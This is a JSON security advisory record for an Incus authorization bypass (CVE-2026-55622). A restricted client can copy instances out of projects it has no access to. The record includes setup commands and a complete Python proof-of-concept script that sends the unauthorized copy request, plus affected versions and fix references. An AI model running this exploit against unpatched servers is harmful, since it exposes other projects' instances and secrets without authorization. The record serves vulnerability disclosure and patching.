{"id":"GHSA-c9f5-j9c3-mhrg","summary":"Incus has a project restriction bypass in instance copy across projects","details":"### Summary\nMissing authorization checks exist for instance copying where an attacker knowing the name of a project that they don't have access to and the name of an instance in that project can copy the instance to a new project. This issue could allow an attacker to access secrets in instances they are not authorized to access.\n\n### Details\n`cmd/incusd/instances.go` authorizes `POST /1.0/instances` against the target project. In the copy path, `cmd/incusd/instances_post.go` then loads the source instance from `req.Source.Project` without checking whether the caller can view that source instance.\n\nThe copy must occur on the same server. However, once the copy has been done, nothing prevents a malicious actor from moving the instance to another server.\n\n### PoC\n\n#### Setup\n\nAssumes the target server is remotely accessible and a user/certificate has been added.\n\n```\n# create a new project and instance\nincus project create secrets\nincus profile show default | incus --project secrets edit default\nincus --project secrets init images:debian/trixie secret\n\n# restrict an existing certificate to prevent access to the project\nincus config trust edit cert-fp\n#\u003e set, for example\nrestricted: true\nprojects:\n  - default\n\n# verification, with the restricted certificate\nincus ls remote:\n```\n\n#### Exploitation\n\nThe below script was partly generated. To copy the `secret` instance to the `default` project, the following command can be used.\n\n```\npython3 poc.py --url https://IP-REMOTE:8443 \\\n    --cert path/to/client.crt --key path/to/client.key \\\n    --target-project default --source-project secrets \\\n    --source-instance secret --name copy-secret --insecure\n```\n\nWait a bit for the instance to be copied, then `incus ls remote:` to see the copied instance.\n\n```\n#!/usr/bin/env python3\n\"\"\"Copy an instance from a project the caller should not be able to read.\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport json\nimport ssl\nimport sys\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\n\ndef post(url: str, path: str, body: dict, cert: str, key: str, insecure: bool) -\u003e bytes:\n    ctx = ssl.create_default_context()\n    if insecure:\n        ctx.check_hostname = False\n        ctx.verify_mode = ssl.CERT_NONE\n    ctx.load_cert_chain(cert, key)\n\n    req = urllib.request.Request(\n        url.rstrip(\"/\") + path,\n        data=json.dumps(body).encode(),\n        method=\"POST\",\n        headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"},\n    )\n    try:\n        with urllib.request.urlopen(req, context=ctx) as resp:\n            return resp.read()\n    except urllib.error.HTTPError as exc:\n        sys.stderr.write(exc.read().decode(errors=\"replace\") + \"\\n\")\n        raise\n\n\ndef main() -\u003e int:\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--url\", required=True)\n    ap.add_argument(\"--cert\", required=True)\n    ap.add_argument(\"--key\", required=True)\n    ap.add_argument(\"--target-project\", required=True)\n    ap.add_argument(\"--source-project\", required=True)\n    ap.add_argument(\"--source-instance\", required=True)\n    ap.add_argument(\"--name\", required=True, help=\"new instance name in target project\")\n    ap.add_argument(\"--instance-only\", action=\"store_true\")\n    ap.add_argument(\"--start\", action=\"store_true\")\n    ap.add_argument(\"--insecure\", action=\"store_true\")\n    ap.add_argument(\"--dry-run\", action=\"store_true\")\n    args = ap.parse_args()\n\n    body = {\n        \"name\": args.name,\n        \"source\": {\n            \"type\": \"copy\",\n            \"source\": args.source_instance,\n            \"project\": args.source_project,\n            \"instance_only\": args.instance_only,\n        },\n        \"start\": args.start,\n    }\n    path = \"/1.0/instances?\" + urllib.parse.urlencode({\"project\": args.target_project})\n    print(json.dumps(body, indent=2))\n    if args.dry_run:\n        return 0\n    print(post(args.url, path, body, args.cert, args.key, args.insecure).decode(errors=\"replace\"))\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n\n### Impact\n\nAn attacker can copy instances they don't normally have access to, possibly leading to information disclosure.","aliases":["CVE-2026-55622","GO-2026-6319"],"modified":"2026-09-02T19:56:02.791505529Z","published":"2026-08-28T18:57:27Z","database_specific":{"github_reviewed_at":"2026-08-28T18:57:27Z","nvd_published_at":"2026-08-21T15:16:42Z","cwe_ids":["CWE-284"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/lxc/incus/security/advisories/GHSA-c9f5-j9c3-mhrg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55622"},{"type":"WEB","url":"https://github.com/lxc/incus/pull/3542"},{"type":"WEB","url":"https://github.com/lxc/incus/commit/1e3ffc53a10950e55de62ac1e0d612be597b84eb"},{"type":"WEB","url":"https://discuss.linuxcontainers.org/t/incus-7-2-has-been-released/26879"},{"type":"PACKAGE","url":"https://github.com/lxc/incus"},{"type":"WEB","url":"https://github.com/lxc/incus/releases/tag/v7.2.0"}],"affected":[{"package":{"name":"github.com/lxc/incus/v7/cmd/incusd","ecosystem":"Go","purl":"pkg:golang/github.com/lxc/incus/v7/cmd/incusd"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"7.2.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-c9f5-j9c3-mhrg/GHSA-c9f5-j9c3-mhrg.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"}]}